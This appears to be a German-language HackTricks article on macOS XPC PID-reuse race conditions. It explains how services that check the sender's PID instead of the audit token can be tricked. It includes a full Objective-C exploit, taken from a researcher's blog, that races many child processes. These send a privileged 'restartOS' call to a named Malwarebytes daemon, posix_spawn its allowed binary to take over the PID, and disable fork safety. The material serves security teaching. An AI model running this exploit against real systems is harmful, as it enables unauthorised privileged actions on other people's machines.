macOS PID Reuse

Unterstütze HackTricks

PID Wiederverwendung

Wenn ein macOS XPC-Dienst den aufgerufenen Prozess basierend auf der PID und nicht auf dem Audit-Token überprüft, ist er anfällig für einen PID-Wiederverwendungsangriff. Dieser Angriff basiert auf einer Rennbedingung, bei der ein Exploit Nachrichten an den XPC-Dienst sendet, um die Funktionalität auszunutzen, und kurz danach posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ) mit der erlaubten Binärdatei ausführt.

Diese Funktion lässt die erlaubte Binärdatei die PID besitzen, aber die bösartige XPC-Nachricht wäre gerade vorher gesendet worden. Wenn der XPC-Dienst die PID zur Authentifizierung des Absenders verwendet und sie NACH der Ausführung von posix_spawn überprüft, wird er denken, dass sie von einem autorisierte Prozess kommt.

Exploit-Beispiel

Wenn du die Funktion shouldAcceptNewConnection oder eine von ihr aufgerufene Funktion findest, die processIdentifier aufruft und nicht auditToken aufruft. Es bedeutet höchstwahrscheinlich, dass sie die PID des Prozesses und nicht das Audit-Token überprüft. Wie zum Beispiel in diesem Bild (aus der Referenz entnommen):

Überprüfe dieses Beispiel-Exploit (wiederum aus der Referenz entnommen), um die 2 Teile des Exploits zu sehen:

  • Einer, der mehrere Forks generiert

  • Jeder Fork wird die Payload an den XPC-Dienst senden, während er posix_spawn direkt nach dem Senden der Nachricht ausführt.

Damit der Exploit funktioniert, ist es wichtig, export`` ``OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES oder es innerhalb des Exploits zu setzen:

asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");

Erste Option mit NSTasks und Argument, um die Kinder zu starten, um die RC auszunutzen.

// Code from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
// gcc -framework Foundation expl.m -o expl

#import <Foundation/Foundation.h>
#include <spawn.h>
#include <sys/stat.h>

#define RACE_COUNT 32
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"

// allow fork() between exec()
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");

extern char **environ;

// defining necessary protocols
@protocol ProtectionService
- (void)startDatabaseUpdate;
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
- (void)uninstallProduct;
- (void)installProductUpdate;
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
- (void)triggerLicenseRelatedChecks;
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
- (void)restartOS;
- (void)resumeScanJob;
- (void)pauseScanJob;
- (void)stopScanJob;
- (void)startScanJob;
- (void)disposeOperationBy:(NSUUID *)arg1;
- (void)subscribeTo:(long long)arg1;
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
@end

void child() {

// send the XPC messages
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
xpcConnection.remoteObjectInterface = remoteInterface;

[xpcConnection resume];
[xpcConnection.remoteObjectProxy restartOS];

char target_binary[] = BINARY;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}

bool create_nstasks() {

NSString *exec = [[NSBundle mainBundle] executablePath];
NSTask *processes[RACE_COUNT];

for (int i = 0; i < RACE_COUNT; i++) {
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
}

int i = 0;
struct timespec ts = {
.tv_sec = 0,
.tv_nsec = 500 * 1000000,
};

nanosleep(&ts, NULL);
if (++i > 4) {
for (int i = 0; i < RACE_COUNT; i++) {
[processes[i] terminate];
}
return false;
}

return true;
}

int main(int argc, const char * argv[]) {

if(argc > 1) {
// called from the NSTasks
child();

} else {
NSLog(@"Starting the race");
create_nstasks();
}

return 0;
}

Weitere Beispiele

Referenzen

Unterstütze HackTricks

Last updated